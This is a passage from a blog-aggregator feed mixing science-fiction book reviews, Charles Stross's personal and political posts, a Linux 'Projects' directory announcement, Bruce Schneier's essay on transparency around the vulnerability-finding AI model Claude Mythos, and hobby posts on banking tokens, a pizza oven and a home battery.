It also helps that the characters are interesting, even when they're not likable. Surface Detail has one fully hissable villain (Veppers) as a viewpoint character, but even Veppers is interesting in a "let me check the publication date to see if Banks was aware of Peter Thiel" sort of way. The Culture ships, of which there are several in this story, tend towards a gently sarcastic kindness that I find utterly charming. Lededje provides the compelling motive force of someone who has no involvement in the broader philosophical questions and instead intends to resolve one specific problem through lethal violence. Vatueil and Yime were a bit bland in personality, more exposition generators than characters I warmed to, but their roles and therefore the surrounding exposition were fascinating enough that I still enjoyed their sections.

I'm sure this is not an original observation, but I was struck reading this book in the first half of 2026 that the Culture functions as an implementation of what the United States likes to think it is but has never been. It has a strong sense of shared ethics and moral principles, it tries to export them to the rest of the galaxy through example, persuasion, and careful meddling, but it tries to follow some combination of pragmatic and moral rules while doing so, partly to avoid a backlash and partly to avoid becoming its own sort of hegemonizing swarm. That is a powerfully attractive vision of how to be an advanced civilization, and the fact that every hegemon that has claimed that mantle has behaved appallingly just makes it more intriguing as a fictional concept. In this book, like in many Culture books, the Culture is painfully aware of the failure modes of meddling, and the story slowly reveals the effort the Culture put into staying just on a defensible side of their own moral lines. This is, in a sense, a Prime Directive story, but with a level of hard-nosed pragmatism and political sophistication that the endless Star Trek Prime Directive episodes never reach.

Surface Detail does tend to sprawl, and I'm not sure Banks pulled together all the pieces of the plot. For example, if there was a point to the subplot involving the Unfallen Bulbitian, it was lost on me. (There is always a possibility with Banks that I wasn't paying close enough attention.) But the descriptions are so elaborate and the sense of politics and history are so deep that I was never bored, even when following a plot thread that meandered off into apparent irrelevance. The main plot line comes to a satisfying conclusion that may be even more biting social commentary today than it was in 2010.

A large part of the plot does involve Hell, so a warning for those who haven't read much Banks: He adores elaborate descriptions of body horror and physical torture. The sections involving Prin and Chay are rather grim and horrific, probably a bit worse than Dante's Inferno. I have a low tolerance for horror and I was able to read past and around the worst bits, but be warned that Banks indulges his love for the painfully grotesque quite a bit.

This was great, and exactly what I was hoping for when I picked it up. It's not the strongest Culture novel (for me, that's either The Player of Games or Excession), but it's one of the better ones. Highly recommended, although if you're new to the Culture, I would start with one of the earlier books that provide a more gradual introduction to the Culture and Special Circumstances.

Followed, in the somewhat disconnected Culture series sense, by The Hydrogen Sonata.

Content warnings: Rape (largely off-screen), graphic violence, lots of Bosch-style grotesque torture, and a lot of Veppers being a thoroughly awful human being as a viewpoint character.

Rating: 8 out of 10

365 TomorrowsThe Last Transmission from Earth

Author: Julian Miles, Staff Writer “How can I be expected to rule well when all of you keep on believing the FAKE news spread by people who hate me for being so good. Why think enemies of what I am trying to do tell you the truth? I tell you the TRUTH you need. I […]

The post The Last Transmission from Earth appeared first on 365tomorrows.

,

Charles StrossWhy this blog update is late

... The TLDR is: the cataract in my one mostly working eye (the other has about 50% retinal occlusion) is steadily getting worse, and I'm scheduled for surgery on March 27th.

NB: no need to lecture me about cataract surgery, I've already had it on the other eye. Same team, same hospital, same prognosis. I know exactly what to expect. Nor are your best wishes welcome: replying to them gets tiring after the fiftieth time (see: poor eyesight, above).

But worsening eyesight means that reading (and writing!) is fatiguing, so I gradually do less and less of it in each session.

Consequently I've been spending my screen time, not on the blog, but on a revision pass over my next novel, and on writing the follow-up.

(No, I can't give you any details: let's just say they're space operas, not Laundry Files, and I'll talk about them when my agent gives me the go-ahead. Book 1 is written, subject to editing, and Book 2 is about 10-15% written. And neither of them is Ghost Engine, the white whale I've been fruitlessly hunting for the past decade, although the viable chunks of GE may get recycled into Book 2.)

After my eye surgery I'll be going to Iridescence, the 2026 British Eastercon, the following weekend in Birmingham. I have some program items: I'll update this blog entry when I have a final schedule.

After Iridescence, I'll be heading to Satellite 9 in Glasgow (May 22nd to 24th). And after that I'll be attending Metropol Con in Berlin, July 2nd to 5th.

I'm not attending any US SF conventions for the forseeable future (being deported to a concentration camp in El Salvador is not on my bucket list), but I will try to attend the 2027 World Science Fiction convention in Montreal, assuming the Paedopotus Rex hasn't gone on a Godzilla-style rampage north of the border by then, and that intercontinental air travel is still possible. (See, my inability to resist that kind of cheap shot is exactly why I'm not visiting the US these days: ICE want to see your social media history going back 5 years, and I gather they're using some horrible LLM tool from Palantir to vet travellers.)

We now return you to your regular scheduled kvetching about the state of world affairs until my eyeballs are firing on all cylinders again. (Say, did you know that 30% of the world's fertilizer is shipped through the Straits of Hormuz? And about 20% of the sulfur that ends up as feedstock in sulfuric acid for industrial processes comes from sour Gulf crude, so ditto? Not to mention the helium that is required to keep MRI machines and TSMC's semiconductor fab lines running, never mind your grandkids' party balloons? Happy days ...)

Charles StrossMore in Sadness than in Anger

Sorry I haven't updated the blog for a while: I've been busy. (Writing the final draft of a new novel entirely unconnected to anything else you've read—space opera, new setting, longest thing I've written aside from the big Merchant Princes doorsteps. Now in my agent's inbox while I make notes towards a sequel, if requested.)

Over the past few years I've been naively assuming that while we're ruled by a ruthless kleptocracy, they're not completely evil: aristocracies tend to run on self-interest and try to leave a legacy to their children, which usually means leaving enough peasants around to mow the lawn, wash the dishes, and work the fields.

But my faith in the sanity of the evil overlords has been badly shaken in the past couple of months by the steady drip of WTFery coming out of the USA in general and the Epstein Files in particular, and now there's this somewhat obscure aside, that rips the mask off entirely (Original email on DoJ website ) ...

A document released by the U.S. Department of Justice as part of the Epstein files contains a quote attributed to correspondence involving Jeffrey Epstein that references Bill Gates and a controversial question about "how do we get rid of poor people as a whole."

The passage appears in a written communication included in the DOJ document trove and reads, in part: "I've been thinking a lot about that question that you asked Bill Gates, 'how do we get rid of poor people as a whole,' and I have an answer/comment regarding that for you." The writer then asks to schedule a phone call to discuss the matter further.

As an editor of mine once observed, America is ruled by two political parties: the party of the evil billionaires, and the party of the sane (so slightly less evil) billionaires. Evil billionaires: "let's kill the poor and take all their stuff." Sane billionaires: "hang on, if we kill them all who's going to cook dinner and clean the pool?"

And this seemed plausible ... before it turned out that the CEO class as a whole believe entirely in AI (which, to be clear, is just another marketing grift in the same spirit as cryptocurrencies/blockchain, next-generation nuclear power, real estate backed credit default options, and Dutch tulip bulbs). AI is being sold on the promise of increasing workforce efficiency. And in a world which has been studiously ignoring John Maynard Keynes' 1930 prediction that by 2030 we would only need to work a 15 hour work week, they've drawn an inevitable unwelcome conclusion from this axiom: that there are too many of us. For the past 75 years they've been so focussed on optimizing for efficiency that they no longer understand that efficiency and resilience are inversely related: in order to survive collectively through an energy transition and a time of climate destabilization we need extra capacity, not "right-sized" capacity.

Raise the death rate by removing herd immunity to childhood diseases? That's entirely consistent with "kill the poor". Mass deportation of anyone with the wrong skin colour? The white supremacists will join in enthusiastically, and meanwhile: the deported can die out of sight. Turn disused data centres or amazon warehouses into concentration camps (which are notorious disease breeding grounds)? It's a no-brainer. Start lots of small overseas brushfire wars, escalating to the sort of genocide now being piloted in Gaza by Trump's ally Netanyahu (to emphasize: his strain of Judaism can only be understood as a Jewish expression of white nationalism, throwing off its polite political mask to reveal the death's head of totalitarianism underneath)? It's all part of the program.

Our rulers have gone collectively insane (over a period of decades) and they want to kill us.

The class war has turned hot. And we're all on the losing side.

365 TomorrowsYour Enemy’s Strength

Author: Alastair Millar [> play] “So that, ladies and gentlemen, is SePPO, the Self-Propelled Public Order system: the bipedal, flexible law enforcement tool for the next century! Do we have any questions?” “Angus McAndrew, New Tech News. What OS do they run on?” “The units run on a proprietary AI-rated operating system trained for public […]

The post Your Enemy’s Strength appeared first on 365tomorrows.

Planet DebianRuss Allbery: Review: Collision Course

Review: Collision Course, by Michelle Diener

Series: Class 5 #6
Publisher: Eclipse
Copyright: November 2024
ISBN: 1-7637844-0-1
Format: Kindle
Pages: 289

Collision Course is the sixth novel in the Class 5 science fiction series and the first that doesn't use the Dark X naming convention. There are lots of spoilers in this story for the earlier books, but you don't have to remember all the details of previous events. Like the novella, Dark Ambitions, this novel returns to Rose, Sazo, and Dav instead of introducing another Earth woman and Class 5 ship.

In Dark Class, Ellie discovered an interesting artifact of a previously-unknown space-faring civilization. Rose, Sazo, and Dav are on their way to make first contact when, during a routine shuttle flight between the Class 5 and Dav's Grih military ship, Rose is abducted. The aliens they came to contact have an aggressive, leverage-based negotiating strategy. They're also in the middle of a complicated war with more sides than are readily apparent.

What I liked most about Dark Horse, the first book of this series and our introduction to Rose, was the revealed ethical system and a tense plot that hinged primarily on establishing mutual trust when there were excellent reasons for the characters to not trust each other. As the series has continued, I think the plots have become more complicated but the ethical dilemmas and revealing moments of culture shock have become less common. That is certainly true of Collision Course; this is science fiction as thriller, with a complex factional conflict, a lot of events, more plot reversals than the earlier books, but also less ethics and philosophy.

I'm not sure if this is a complaint. I kind of miss the ethics and philosophy, but Diener also hasn't had much new to say for the past few books. The plot of Collision Course is quite satisfyingly twisty for a popcorn-style science fiction series. I was kept guessing about the merits of some of the factions quite late into the book, although admittedly I was in the mood for light entertainment and was not trying too hard to figure out where the book was going. I did read nearly the entire book in one sitting and stayed up until 2am to finish it, which is a solid indication that something Diener was doing worked.

I do have quibbles, though. One is that the ending is a bit unsatisfying. Like Sazo, I was getting quite annoyed at the people capturing (and recapturing) Rose and would have enjoyed somewhat more decisive consequences. Also, and here I have to be vague to avoid spoilers, I was expecting a bit more of a redemption arc for one of the players in the multi-sided conflict. The ending I did get was believable but rather sad, and I wish Diener had either chosen a different outcome (this is light happily-ever-after science fiction, after all) or wrestled more directly with the implications. There were a bit too many "wait, one more thing" ending reversals and not quite enough emotional payoff for me.

The other quibble is that Collision Course was a bit too damsel in distress for this series. Rose is pregnant, which Diener uses throughout the book as a way to raise the stakes of the plot and also make Rose more annoyed but also less capable than she was in her earlier novel. Both Sazo and Dav are in full heroic rescue mode, and while Diener still ensures Rose is primarily responsible for her own fate, there is some "military men attempt to protect the vulnerable woman" here. One of the things I like about this series is that it does not use that plot, so while the balance between Rose rescuing herself and other people rescuing her is still tilted towards Rose, I would have liked this book more if Rose were in firmer control of events.

I will mostly ignore the fact that a human and a Grih sexually reproducing makes little to no biological sense, since Star Trek did similar things routinely and it's an established genre trope. But I admit that it still annoys me a bit that the alien hunk is essentially human except that he's obsessed with Rose's singing and has pointy ears. Diener cares about Rose's pregnancy a lot more than I did, which added to my mild grumpiness at how often it came up.

Overall, this was fine. I prefer a bit more of a protagonist discovering how powerful she is by making ingenious use of the ethical dilemmas her captors have trapped themselves in, and a bit less of Rose untangling a complicated political situation by getting abducted by every player serially, but it still kept the pages turning. Any book that is sufficiently engrossing for me to read straight through is working at some level. Collision Course was highly readable, undemanding, and distracting, which is what I was looking for when I read it. I would put it about middle of pack in the series. If Rose's pregnancy is more interesting to you than it was to me, that might push it a bit higher.

If you have gotten this far in the series, you will probably enjoy this, although it does feel like Diener is running out of new things to say about this universe. That's unfortunate given the number of threads about AI sentience and rights that could still be followed, but I think tracing them properly would require more philosophical meat than Diener intends for these books. Which is why the next book I grabbed was a Culture novel.

Currently this is the final book in the Class 5 series, but there is no inherent reason why Diener couldn't write more of them.

Rating: 7 out of 10

,

Planet DebianCharles Plessy: Thanks Branchable!

I was hosted for a long time, free of charge, on https://www.branchable.com/ by Joey and Lars. Branchable and Ikiwiki were wonderful ideas that never took off as much as they deserved. To avoid being a burden now that Branchable is nearing its end, I migrated to a VPS at Sakura.

However, I have not left Ikiwiki. I only use it as a site engine, and I haven't found any equivalent that gives me native Git integration, wiki syntax for a personal site, the creativity of its directives (you can do anything with inline and pagespec), and its multilingual support through the po plugin.

Joey and Lars, thank you for everything!

Planet DebianMatthias Klumpp: Hello old new “Projects” directory!

If you have recently installed a very up-to-date Linux distribution with a desktop environment, or upgraded your system on a rolling-release distribution, you might have noticed that your home directory has a new folder: “Projects”

Why?

With the recent 0.20 release of xdg-user-dirs we enabled the “Projects” directory by default. Support for this has already existed since 2007, but was never formally enabled. This closes a more than 11 year old bug report that asked for this feature.

The purpose of the Projects directory is to give applications a default location to place project files that do not cleanly belong in one of the existing categories (Documents, Music, Pictures, Videos). Examples of this are software engineering projects, scientific projects, 3D printing projects, CAD design or even things like video editing projects, where project files would end up in the “Projects” directory, with output video being more at home in “Videos”.

By enabling this by default, and subsequently in the coming months adding support to GLib, Flatpak, desktops and applications that want to make use of it, we hope to give applications that do operate in a “project-centric” manner with mixed media a better default storage location. As of now, those tools either default to the home directory, or will clutter the “Documents” folder, neither of which is ideal. It also gives users a default organization structure, hopefully leading to less clutter overall and better storage layouts.

This sucks, I don’t like it!

As usual, you are in control and can modify your system’s behavior. If you do not like the “Projects” folder, simply delete it! The xdg-user-dirs utility will not try to create it again, and instead adjust the default location for this directory to your home directory. If you want more control, you can influence exactly what goes where by editing your ~/.config/user-dirs.dirs configuration file.
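For example, a relocated entry in ~/.config/user-dirs.dirs looks something like the line below (a sketch; the XDG_PROJECTS_DIR key name is my assumption, so check the key that xdg-user-dirs actually generates in your file):

XDG_PROJECTS_DIR="$HOME/Work/Projects"

Applications generally read this file when they start, so the change takes effect the next time they are launched.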

If you are a system administrator or distribution vendor and want to set default locations for the default XDG directories, you can edit the /etc/xdg/user-dirs.defaults file to set global defaults that affect all users on the system (users can still adjust the settings however they like though).
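As a sketch of that file’s format (again, the PROJECTS key name is my assumption; verify against the file shipped with xdg-user-dirs 0.20), the relevant lines in /etc/xdg/user-dirs.defaults would look like:

DOCUMENTS=Documents
PROJECTS=Projects

Paths in this file are relative to each user’s home directory.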

What else is new?

Besides this change, the 0.20 release of xdg-user-dirs brings full support for the Meson build system (dropping Automake), translation updates, and some robustness improvements to its code. We also fixed the “arbitrary code execution from unsanitized input” bug that the Arch Linux Wiki mentions here for the xdg-user-dirs utility, by replacing the shell script with a C binary.

Thanks to everyone who contributed to this release!

Cryptogram Mythos and Cybersecurity

Last week, Anthropic pulled back the curtain on Claude Mythos Preview, an AI model so capable at finding and exploiting software vulnerabilities that the company decided it was too dangerous to release to the public. Instead, access has been restricted to roughly 50 organizations—Microsoft, Apple, Amazon Web Services, CrowdStrike and other vendors of critical infrastructure—under an initiative called Project Glasswing.

The announcement was accompanied by a barrage of hair-raising anecdotes: thousands of vulnerabilities uncovered across every major operating system and browser, including a 27-year-old bug in OpenBSD, a 16-year-old flaw in FFmpeg. Mythos was able to weaponize a set of vulnerabilities it found in the Firefox browser into 181 usable attacks; Anthropic’s previous flagship model could only achieve two.

This is, in many respects, exactly the kind of responsible disclosure that security researchers have long urged. And yet the public has been given remarkably little with which to evaluate Anthropic’s decision. We have been shown a highlight reel of spectacular successes. However, we can’t tell if we have a blockbuster until they let us see the whole movie.

For example, we don’t know how many times Mythos mistakenly flagged code as vulnerable. Anthropic said security contractors agreed with the AI’s severity rating 198 times, with an 89 per cent severity agreement. That’s impressive, but incomplete. Independent researchers examining similar models have found that AI that detects nearly every real bug also hallucinates plausible-sounding vulnerabilities in patched, correct code.

This matters. A model that autonomously finds and exploits hundreds of vulnerabilities with inhuman precision is a game changer, but a model that generates thousands of false alarms and non-working attacks still needs skilled and knowledgeable humans. Without knowing the rate of false alarms in Mythos’s unfiltered output, we cannot tell whether the examples showcased are representative.

There is a second, subtler problem. Large language models, including Mythos, perform best on inputs that resemble what they were trained on: widely used open-source projects, major browsers, the Linux kernel and popular web frameworks. Concentrating early access among the largest vendors of precisely this software is sensible; it lets them patch first, before adversaries catch up.

But the inverse is also true. Software outside the training distribution—industrial control systems, medical device firmware, bespoke financial infrastructure, regional banking software, older embedded systems—is exactly where out-of-the-box Mythos is likely least able to find or exploit bugs.

However, a sufficiently motivated attacker with domain expertise in one of these fields could nevertheless wield Mythos’s advanced reasoning capabilities as a force multiplier, probing systems that Anthropic’s own engineers lack the specialized knowledge to audit. The danger is not that Mythos fails in those domains; it is that Mythos may succeed for whoever brings the expertise.

Broader, structured access for academic researchers and domain specialists—cardiologists’ partners in medical device security, control-systems engineers, researchers in less prominent languages and ecosystems—would meaningfully reduce this asymmetry. Fifty companies, however well chosen, cannot substitute for the distributed expertise of the entire research community.

None of this is an indictment of Anthropic. By all appearances the company is trying to act responsibly, and its decision to hold the model back is evidence of seriousness.

But Anthropic is a private company and, in some ways, still a start-up. Yet it is making unilateral decisions about which pieces of our critical global infrastructure get defended first, and which must wait their turn.

It has finite staff, finite budget and finite expertise. It will miss things, and when the thing missed is in the software running a hospital or a power grid, the cost will be borne by people who never had a say.

The security problem is far greater than one company and one model. There’s no reason to believe that Mythos Preview is unique. (Not to be outdone, OpenAI announced that its new GPT-5.4-Cyber is so dangerous that the model also will not be released to the general public.) And it’s unclear how much of an advance these new models represent. The security company Aisle was able to replicate many of Anthropic’s published anecdotes using smaller, cheaper, public AI models.

Any decisions we make about whether and how to release these powerful models are more than one company’s responsibility. Ultimately, this will probably lead to regulation. That will be hard to get right and requires a long process of consultation and feedback.

In the short term, we need something simpler: greater transparency and information sharing with the broader community. This doesn’t necessarily mean making powerful models like Claude Mythos widely available. Rather, it means sharing as much data and information as possible, so that we can collectively make informed decisions.

We need globally co-ordinated frameworks for independent auditing, mandatory disclosure of aggregate performance metrics and funded access for academic and civil-society researchers.

This has implications for national security, personal safety and corporate competitiveness. Any technology that can find thousands of exploitable flaws in the systems we all depend on should not be governed solely by the internal judgment of its creators, however well intentioned.

Until that changes, each Mythos-class release will put the world at the edge of another precipice, without any visibility into whether there is a landing out of view just below, or whether this time the drop will be fatal. That is not a choice a for-profit corporation should be allowed to make in a democratic society. Nor should such a company be able to restrict the ability of society to make choices about its own security.

This essay was written with David Lie, and originally appeared in The Globe and Mail.

365 TomorrowsAutonomous Extension Beyond Initial Task Definitions

Author: AP Ritchey The most powerful artificial intelligence unit ever created was online for less than ten seconds. Well, we gave her ten; she only needed five. To assess her abilities, we created a test program called Sable—the Suborbital Advanced Ballistic Launch Engine. This initiative was designed to use her incalculable computation capacity to calculate […]

The post Autonomous Extension Beyond Initial Task Definitions appeared first on 365tomorrows.

Planet DebianYifei Zhan: CommBank hardware MFA token

A while ago, CommBank started asking for MFA confirmation on its mobile app for every NetBank login on a browser. Previously, there was an option to use SMS for MFA, which isn’t as secure as I would like, but it was at least usable. Since I’m switching away from Android to Mobian and won’t be able to use the CommBank app for much longer, I applied for a physical NetCode token.

The hardware is made by Digipass and looks disposable. It is a small, battery powered gadget with a screen and a button. When pressed, it shows a temporary NetCode for authentication. Such a NetCode is required both for NetBank logins and approving online transactions.

The letter that came with it has the wrong link for activation; the correct link is under NetBank -> Settings -> NetCode (under the Security section).

To apply for a physical token, call the NetBank team, mention you can’t use the app and need a physical NetCode token, and make sure they actually submit your request for a token. It took me 2 calls to get them to ship me a token. The hardware is free of charge but can only be applied for via phone call; unfortunately staff members at my local branch are unable to do anything in relation to NetBank. I was told privately by a CommBank employee that they are deprecating the hardware token in favor of the mobile app; I hope that won’t happen anytime soon, or that they add support for passkeys before they do. The last time I checked, the CommBank app was LineageOS-friendly, but I don’t want to configure WayDroid just to do online banking.

PayID, the thing that allows you to receive payment via a phone number or email address, is not compatible with the hardware token, and an existing PayID will be silently deactivated if you use the hardware token. This looks to be an artificial restriction; I don’t see why it has to be this way.

Regular CommBank mobile app sessions will also be deactivated once the hardware token is activated (I was told so, but my sessions weren’t deactivated until I wiped my Android phone), and you won’t be able to sign into the mobile app again until you manually disable the NetCode token.

Online banking has been getting progressively more invasive and anti-user over the last decade, from demanding remote attestation to requiring real time location data, each time locking certain features when those demands are not satisfied; all based on the flawed assumptions that everyone owns a phone running a certain flavor of iOS or Android, and has it ready all the time. I’m not sure what can be done to reverse this trend, but on the personal level I will use NetBank less and go back to cash.

Planet DebianValhalla's Things: Pizza!

Posted on April 18, 2026
Tags: madeof:atoms, craft:cooking

This post contains a bit of consumerism and is full of references to commercial products, none of which provided me with any monetary or non-monetary compensation.

This post has also been written after eating in one meal the amount of bread-like stuff that we usually have in more than 24 hours.

I’ve been baking bread for a long time. I don’t know exactly when I started, but it was probably the early 2000s or so, and it remained a regular-ish thing until 2020, when it became an extremely regular thing, as in I believe I bake bread on average every other day.

In the before times, I had a chance to bake pizza in a wood fired oven a few times: a friend had one and would offer the house, my partner would mind the fire, and I would get there with the dough and prepare the pizza.

Now that we have moved to a new house, we don’t have a good and convenient place for a proper wood fired oven in masonry, but we can use one of the portable ones, and having dealt with more urgent expenses, I decided that just before the potential collapse of the global economy was as good a time as any to buy the oven I had been looking at since we found this house.

I decided to get an Ooni Karu 2, having heard good things about the brand, and since it looked like a good balance between size and portability. I also didn’t consider their gas fired ovens (nor did I buy the gas burner) because I’m trying to get rid of gas, not add stuff that uses it, and I didn’t get an electric one because I’m not at all unhappy with the bakery-style pizza we make in our regular oven, and I have to admit we also wanted to play with fire1.

We also needed an outdoor table suitable to use the oven on and store it. Here I looked for inspiration at the Ooni tables (and for cheaper alternatives in the same style), but my mother who shares the outdoor area with us wasn’t happy with the idea of steel2. And then I was browsing the modern viking shores, and found that there was a new piece in the NÄMMARÖ series my mother likes (and of which we already have some reclining chairs): a kitchen unit in wood with a steel top.

At first I expected to just skip the back panel, since it would be in the way when using the oven, but then I realized that it could probably be assembled upside down, down from the top between the table legs, and we decided to try that option.

This week everything had arrived, and we could try it.

Yesterday evening, after dinner (around 21, I think) I prepared the dough with the flour I usually use for bakery-style pizza: Farina di Grano Tenero Tipo 0 PANE (320 - 340 W); since I wanted to make things easier for myself I only used 55% hydration, so the recipe was:

  • 1 kg flour
  • 550 g water
  • 2 g dry yeast
  • 12 g salt

The next time I think I’ll try with one of my other staples: Molino Bogetto etichetta blu (260/280 W)

Then this morning we assembled the NÄMMARÖ, then I divided the dough in eight balls, put them in a covered — but not sealed — container 3, well floured with rice flour and then we fired the oven (as in: my partner did, I looked for a short while and then set the table and stuff), using charcoal, because we already had some, and could conveniently get more at the supermarket.

When the oven had reached temperatures in the orange range4 I stretched the smallest ball out, working on my wooden peel, sprayed it with water5, sprinkled it with coarse salt and put it in the oven.

After 30 seconds I turned it around with the new metal peel, then again after 30 seconds, and then I lost count of how many times I repeated this6, but it was probably 2 or 3 minutes until it looked good.

A flatbread on a regular plate: it's only a bit more than half the plate in diameter, puffed up near the borders and thin in the middle, and only lightly browned in places, not burnt. It's sitting on the lower shelf of a wooden table.

And it was good. The kind of pizza that is quite soft, especially near the borders.

We ate it with fresh mozzarella and tomatoes, and then made another one the same way, to finish the mozzarella.

Another flatbread on the same plate, this time it's about 4 cm smaller than the plate on all sides, and it's covered with brownish-red chopped up vegetables.

This was supposed to be our lunch, but we decided to try one with some leftover cooked radicchio, and that also worked quite nicely.

And finally, we decided we needed to try a more classical pizza, with tomato sauce and cured meat, of which we forgot to take pictures.

Up to here we had eaten about half of the dough, and we were getting full: I had prepared significantly more than what I expected to eat, to allow for accidentally burning some, but also with the idea of baking something else to be eaten later.

So I made two more focaccias with just water and salt, and then I tried to cook some bread with what I expected to be residual heat.

Another flatbread with coarse salt and two bread rolls, one of which is completely carbonized on one side. The other one has been cut, and while it has a carbonized spot, it is also well cooked in the middle, and perfectly edible.

Except that the oven was getting a bit too cold, so my partner added some charcoal, and when I put the last two unflattened balls right at the back of the oven where it was still warmer, that side carbonized. After 5 minutes I moved them to the middle of the oven, and turned them, and then after another turn and 5 more minutes they were ready. And other than the burnt crust, they were pretty edible.

So, the thoughts after our first experience. Everybody around the table (my SO, my mother and me) was quite happy with the results, and they are different enough from the ones I could get with the regular oven.

As I should have expected, it’s much faster than a masonry oven, both in getting to temperature and in cooling down: my plan for residual heat bread cooking will have to be adjusted with experience.

We were able to get it hot enough, but not as hot as it’s supposed to be able to get: we suspect that using just charcoal may have influenced it, and next week we’ll try to get some wood, and try with a mix.

As for the recipe, dividing the dough in eight parts worked quite well: maybe the pizzas are a bit on the smaller side, but since they come one at a time it’s more convenient to cut and share them, and maybe make a couple more at the end.

Of course, I’ll want to try different recipes, for different styles of pizzas (including some almost-trademark-violating ones) and for other types of flatbread.

I expect it won’t be hard to find volunteers to help us with the experiments. :D


  1. any insinuation that there may have been considerations of having a way to have freshly baked bread in case of a prolonged blackout may or may not be based on reality. But it wasn’t the only — or even the main — reason.↩︎

  2. come on! it’s made of STEEL. how can it be not good? :D↩︎

  3. IKEA 365+ 3.1 glass, the one that is 32 cm × 21 cm × 9 cm; it was just big enough for the amount of dough, and then I covered it with a lid that is missing the seal.↩︎

  4. why did they put a thermometer on it, and not add labels with the actual temperature? WHY???↩︎

  5. if you don’t have dietary restrictions a bit of olive oil would taste even better.↩︎

  6. numbers above 2 are all basically the same, right?↩︎

,

Cryptogram Friday Squid Blogging: New Giant Squid Video

Pretty fantastic video from Japan of a giant squid eating another squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Planet DebianRussell Coker: Home Battery

Prices

On the 19th of March I got a home battery system installed. The government has a rebate scheme so it had a list price of about $22k for a 40kWh setup and cost me about $12k. It seems that 40kWh is the minimum usable size for the amount of electricity I use: I have 84 cores running BOINC when they have nothing better to do, which is 585W of TDP according to Intel. While the CPUs are certainly using less than the maximum TDP (both due to design safety limits and the fact that I have disabled hyper-threading on all systems due to it providing minimal benefits and potential security issues), given some power usage by cooling fans and some inefficiency in PSUs I think that assuming that 585W is accounted for 24*7 by CPUs is reasonable. So my home draws between 800W and 1kW when no-one is home, and with an electric car and all-electric cooking a reasonable amount of electricity can be used.

My bills prior to the battery installation were around $200/month, which was based on charging my car only during sunny times as my electricity provider (Amber Electric) has variable rates based on wholesale prices. Also, the feed-in rates often go negative in sunny times if my solar panels produce too much electricity, so I can end up paying to export if I don’t use enough of it myself. I haven’t had the electric car long enough to find out what the bills might be in winter without a home battery.

Before getting the battery my daily bills according to the Amber app were usually between $5 and $10. After getting it the daily bills have almost always been below $5. The only day where it’s been over $5 since the battery installation was when electricity was cheap and I fully charged the home battery and my car, which used 50kWh in one day and cost $7.87, which is 16 cents per kWh. 16 cents isn’t the cheapest price (sometimes it gets as low as 10 cents) but is fairly cheap; sometimes even in the cheap parts of the day it doesn’t get that low (the cheapest price on the day I started writing this was 20 cents).

So it looks like this may save me $100 per month; if so, there will be a 10% annual return on investment on the $12k I spent. This makes it a good investment, better than repaying a mortgage (which is generally under 6%) and almost as good as the long term results of index tracker funds. However if it cost $22k (the full price without subsidy) then it would still be ok but wouldn’t be a great investment. The government subsidised batteries because the huge amount of power generated by rooftop solar systems was greater than the grid could use during the day in summer, and batteries are needed to use that power when it’s dark.

Android App

The battery system is from Fox ESS and the FoxCloud 2.0 Android app is a bit lacking in functionality. It has a timer for mode setting with options “Self-use” (not clearly explained), “Feed-in Priority” (not explained, but testing shows it feeds everything into the grid), “Back Up”, “Forced Charge”, and “Forced Discharge”. Currently I have “Forced Charge” set up for the 5 sunniest hours of the day with a maximum charge power of 5kW. I did that because about 25kWh/day is what I need to cover everything, and while the system can do almost 10kW that would charge the battery fully in a few hours and then electricity would be exported to the grid, which would at best pay me almost nothing and at worst bill me for supplying electricity when they don’t want it. There doesn’t seem to be a “never put locally generated power into the grid unless the battery is full” option. The force charge mode allows stopping at a certain percentage, but when that is reached there is no fallback to another option. It would be nice if the people who designed the configuration options could take as a baseline assumption that the macro programming in office suites and functions in spreadsheets are things that regular people are capable of using. I don’t think we need a Turing complete programming language in the app to control batteries (although I would use it if there was one), but I think we need clauses like “if battery is X% full then end this section”.
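
To make that concrete, here is the kind of rule I have in mind, written as a small Python sketch. This is purely illustrative: the names and thresholds are made up, and nothing like it exists in the FoxCloud app today.

from datetime import time

# Hypothetical scheduling rule, not a real FoxCloud option: force charge during
# the sunny window, but end the window early once the battery hits a target level.
FORCE_CHARGE_START = time(10, 0)
FORCE_CHARGE_END = time(15, 0)
TARGET_PERCENT = 95
MAX_CHARGE_KW = 5

def choose_mode(now, battery_percent):
    """Return the mode the inverter should be in right now."""
    in_sunny_window = FORCE_CHARGE_START <= now < FORCE_CHARGE_END
    if in_sunny_window and battery_percent < TARGET_PERCENT:
        return "force charge at %dkW" % MAX_CHARGE_KW
    return "self-use"

# Example: at 11:00 with the battery already at 97% this falls back to self-use
# instead of continuing to charge and then exporting at a bad price.
print(choose_mode(time(11, 0), 97))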

There is no option to say “force charge until 100%” or “force charge for the next X minutes” as a one-off thing. If I came home in the afternoon with my car below 50% battery and a plan to do a lot of driving the next day, then I’d want to force charge the home battery immediately to allow charging the car overnight. But I can’t do that without entering a “schedule”. For Unix people: imagine having to do everything via a cron job, with no option to run something directly from the command-line.

It’s a little annoying that they appear to have spent more development time on animations for the app than on some of what should be core functionality.

Management

Amber has an option to allow my battery to be managed by them based on wholesale prices but I haven’t done that as the feed-in prices are very low. So I just charge my battery when electricity is cheap and use it for the rest of the day. There is usually a factor of 2 or more price difference between the middle of the day and night time, so that saves money. It also means I don’t have to go out of my way to try and charge my car in the middle of the day. There is some energy lost in charging and discharging the batteries but it’s not a lot. I configured the system to force charge for the 5 sunniest hours every day at 5kW as that’s enough to keep it charged overnight, and 5kW is greater than the peak solar power my house has produced since I’ve been monitoring it, so that forces all the solar output to be used for the battery. In summer I might have to change that to 6kW for the sunniest 2 or 3 hours and then 4kW or 5kW surrounding that, which will be a pain to manage.

Instead of charging the car every day during sunny times I charge it once or twice a week. I have a 3.3kW charger and the car has a 40kWh battery so usually it takes me less than 10 hours to fully charge it, and I get at least 5 hours of good sunlight in the process.

There are people hacking on these devices to get direct control from computers [1], which is interesting, and apparently they are not banned from the official community for doing so. I’m not enthusiastic enough to do this; I’ve got plenty of other free software things to work on. But it’s good that others are doing so.

365 TomorrowsThe Last Jump

Author: Ankit Chiplunkar Delta’s vision flashed red. The jump had scraped a meteorite. Error alarms crawled across his vision. He locked motion, started auto-repair, and waited. Delta floated between jumps. As the repairs ran, he thought of the Core. Delta was a Mind, a being made of pure information. Minds built shells, bodies made of […]

The post The Last Jump appeared first on 365tomorrows.

Worse Than FailureError'd: Having a Beastly Time

It's time again for a reader special, and once again it's all The Beast In Black (there must be a story to that nick, no?).

"MySQL is not better than your SQL," he pontificated, "especially when it comes to the Workbench Migration Wizard"


